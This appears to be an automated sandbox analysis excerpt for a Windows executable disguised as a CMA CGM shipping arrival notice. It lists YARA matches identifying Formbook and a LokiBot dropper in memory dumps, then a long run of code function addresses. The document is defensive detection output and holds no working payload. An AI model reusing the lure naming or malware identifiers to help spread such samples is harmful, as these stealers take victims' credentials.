Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781055 0_2_00781055
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078F4F6 0_2_0078F4F6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B52A 0_2_0078B52A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00793504 0_2_00793504
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A83B 0_2_0078A83B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781EEB 0_2_00781EEB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078907D 0_2_0078907D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A058 0_2_0078A058
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786059 0_2_00786059
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00783050 0_2_00783050
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A03A 0_2_0078A03A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078C03F 0_2_0078C03F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007890CD 0_2_007890CD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078C0B4 0_2_0078C0B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782098 0_2_00782098
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786140 0_2_00786140
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789144 0_2_00789144
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078211D 0_2_0078211D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007811E1 0_2_007811E1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007881E4 0_2_007881E4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007841E7 0_2_007841E7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078C1D8 0_2_0078C1D8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078C1BD 0_2_0078C1BD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007821A0 0_2_007821A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781278 0_2_00781278
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786259 0_2_00786259
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078423D 0_2_0078423D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782218 0_2_00782218
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786218 0_2_00786218
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789214 0_2_00789214
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007812EF 0_2_007812EF
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007822D8 0_2_007822D8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007862DC 0_2_007862DC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892D0 0_2_007892D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B8 0_2_007892B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B4 0_2_007892B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789295 0_2_00789295
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078228D 0_2_0078228D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078136C 0_2_0078136C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785360 0_2_00785360
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782338 0_2_00782338
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789339 0_2_00789339
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785330 0_2_00785330
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007863DD 0_2_007863DD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007813D5 0_2_007813D5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007823B8 0_2_007823B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007893A8 0_2_007893A8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786389 0_2_00786389
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788461 0_2_00788461
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786459 0_2_00786459
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781453 0_2_00781453
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789431 0_2_00789431
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786434 0_2_00786434
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078242C 0_2_0078242C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007864FC 0_2_007864FC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007824EE 0_2_007824EE
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007824B8 0_2_007824B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007894B9 0_2_007894B9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007884BB 0_2_007884BB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078F4BD 0_2_0078F4BD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007864A9 0_2_007864A9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788490 0_2_00788490
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B491 0_2_0078B491
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789560 0_2_00789560
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789537 0_2_00789537
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078752F 0_2_0078752F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875F9 0_2_007875F9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007865E8 0_2_007865E8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007825E9 0_2_007825E9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007855D9 0_2_007855D9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B5BC 0_2_0078B5BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786589 0_2_00786589
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786671 0_2_00786671
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789668 0_2_00789668
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078766D 0_2_0078766D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782640 0_2_00782640
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785635 0_2_00785635
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B628 0_2_0078B628
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007856F1 0_2_007856F1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007896E9 0_2_007896E9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007876C9 0_2_007876C9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007826A0 0_2_007826A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B6A0 0_2_0078B6A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782770 0_2_00782770
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00787758 0_2_00787758
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078575F 0_2_0078575F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786754 0_2_00786754
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782715 0_2_00782715
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786701 0_2_00786701
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007847F9 0_2_007847F9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007867FD 0_2_007867FD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007807F1 0_2_007807F1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007827ED 0_2_007827ED
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007817D9 0_2_007817D9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007857D5 0_2_007857D5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007877C4 0_2_007877C4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007807BB 0_2_007807BB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007847A4 0_2_007847A4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789783 0_2_00789783
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786868 0_2_00786868
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00784865 0_2_00784865
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078185B 0_2_0078185B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782855 0_2_00782855
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00787849 0_2_00787849
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780834 0_2_00780834
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789829 0_2_00789829
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078682C 0_2_0078682C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007908ED 0_2_007908ED
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007858DD 0_2_007858DD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007868DD 0_2_007868DD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007828CC 0_2_007828CC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007898A0 0_2_007898A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078089F 0_2_0078089F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785895 0_2_00785895
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780979 0_2_00780979
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790960 0_2_00790960
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078293C 0_2_0078293C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078991F 0_2_0078991F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791915 0_2_00791915
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078990D 0_2_0078990D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780903 0_2_00780903
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889F9 0_2_007889F9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889FB 0_2_007889FB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007919B8 0_2_007919B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007899BC 0_2_007899BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007829B1 0_2_007829B1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889AC 0_2_007889AC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788A7C 0_2_00788A7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FA5F 0_2_0078FA5F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791A31 0_2_00791A31
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782A34 0_2_00782A34
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A21 0_2_00789A21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790A01 0_2_00790A01
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791AE1 0_2_00791AE1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788AE1 0_2_00788AE1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789AC7 0_2_00789AC7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782AA4 0_2_00782AA4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A94 0_2_00789A94
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B7C 0_2_00789B7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790B51 0_2_00790B51
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788B54 0_2_00788B54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791B39 0_2_00791B39
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782B1B 0_2_00782B1B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B14 0_2_00789B14
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FB01 0_2_0078FB01
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789BF8 0_2_00789BF8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078EBE8 0_2_0078EBE8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790BED 0_2_00790BED
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780B90 0_2_00780B90
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791C79 0_2_00791C79
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789C60 0_2_00789C60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790C5D 0_2_00790C5D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780C4D 0_2_00780C4D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788C45 0_2_00788C45
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780C2A 0_2_00780C2A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791C1C 0_2_00791C1C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782C10 0_2_00782C10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790C15 0_2_00790C15
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782CED 0_2_00782CED
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791CD9 0_2_00791CD9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780CD0 0_2_00780CD0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788CB8 0_2_00788CB8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789CA0 0_2_00789CA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00782C88 0_2_00782C88
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BD69 0_2_0078BD69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791D61 0_2_00791D61
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780D5C 0_2_00780D5C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789D49 0_2_00789D49
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788D40 0_2_00788D40
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790D44 0_2_00790D44
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00780D2C 0_2_00780D2C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078DD10 0_2_0078DD10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BDFC 0_2_0078BDFC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791DCB 0_2_00791DCB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789DCC 0_2_00789DCC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790DB1 0_2_00790DB1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788DAD 0_2_00788DAD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00792E7A 0_2_00792E7A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E69 0_2_00789E69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BE34 0_2_0078BE34
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788E29 0_2_00788E29
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790E21 0_2_00790E21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E00 0_2_00789E00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790EF8 0_2_00790EF8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00784EBB 0_2_00784EBB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BEBC 0_2_0078BEBC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781EA8 0_2_00781EA8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC 0_2_00785EAC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788EA0 0_2_00788EA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790E85 0_2_00790E85
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F7D 0_2_00788F7D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781F6C 0_2_00781F6C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BF61 0_2_0078BF61
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789F54 0_2_00789F54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BF4B 0_2_0078BF4B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785F4D 0_2_00785F4D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781F10 0_2_00781F10
